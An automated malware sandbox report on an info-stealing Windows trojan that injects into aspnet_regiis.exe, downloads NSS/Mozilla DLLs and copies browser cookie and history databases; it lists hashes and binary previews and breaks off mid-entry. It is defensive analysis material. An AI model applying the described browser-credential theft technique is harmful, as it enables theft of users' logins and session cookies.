                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@4/23@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\AFIIEBGCAAECBGCBGCBK

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\AFIIEBGCAAECBGCBGCBKEHIJEB

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\BFHJECAA

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\ECAKKKKJDBKKFIEBKEHD

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\ECAKKKKJDBKKFIEBKEHDGCAFCB

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.037963276276857943
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\JEHIDHDAKJDHJKEBFIEHCAAEHD

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\KJJJJDHI

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\freebl3.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):685392
                        Entropy (8bit):6.872871740790978
                        Encrypted:false
                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                        MD5:550686C0EE48C386DFCB40199BD076AC
                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\mozglue.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):608080
                        Entropy (8bit):6.833616094889818
                        Encrypted:false
                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\msvcp140.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):450024
                        Entropy (8bit):6.673992339875127
                        Encrypted:false
                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                        C:\ProgramData\nss3.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):2046288
                        Entropy (8bit):6.787733948558952
                        Encrypted:false
                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\softokn3.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):257872
                        Entropy (8bit):6.727482641240852
                        Encrypted:false
                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                        MD5:4E52D739C324DB8225BD9AB2695F262F
                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\vcruntime140.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):80880
                        Entropy (8bit):6.920480786566406
                        Encrypted:false
                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                        MD5:A37EE36B536409056A86F50E67777DD7
                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):42
                        Entropy (8bit):4.0050635535766075
                        Encrypted:false
                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                        Malicious:true
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):685392
                        Entropy (8bit):6.872871740790978
                        Encrypted:false
                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                        MD5:550686C0EE48C386DFCB40199BD076AC
                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):608080
                        Entropy (8bit):6.833616094889818
                        Encrypted:false
                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):450024
                        Entropy (8bit):6.673992339875127
                        Encrypted:false
                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):2046288
                        Entropy (8bit):6.787733948558952
                        Encrypted:false
                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):257872
                        Entropy (8bit):6.727482641240852
                        Encrypted:false
                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                        MD5:4E52D739C324DB8225BD9AB2695F262F
                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):80880
                        Entropy (8bit):6.920480786566406
                        Encrypted:false
                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                        MD5:A37EE36B536409056A86F50E67777DD7
                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.017262956703125623
                        Encrypted:false
                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                        Malicious:false
                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.017262956703125623
                        Encrypted:false
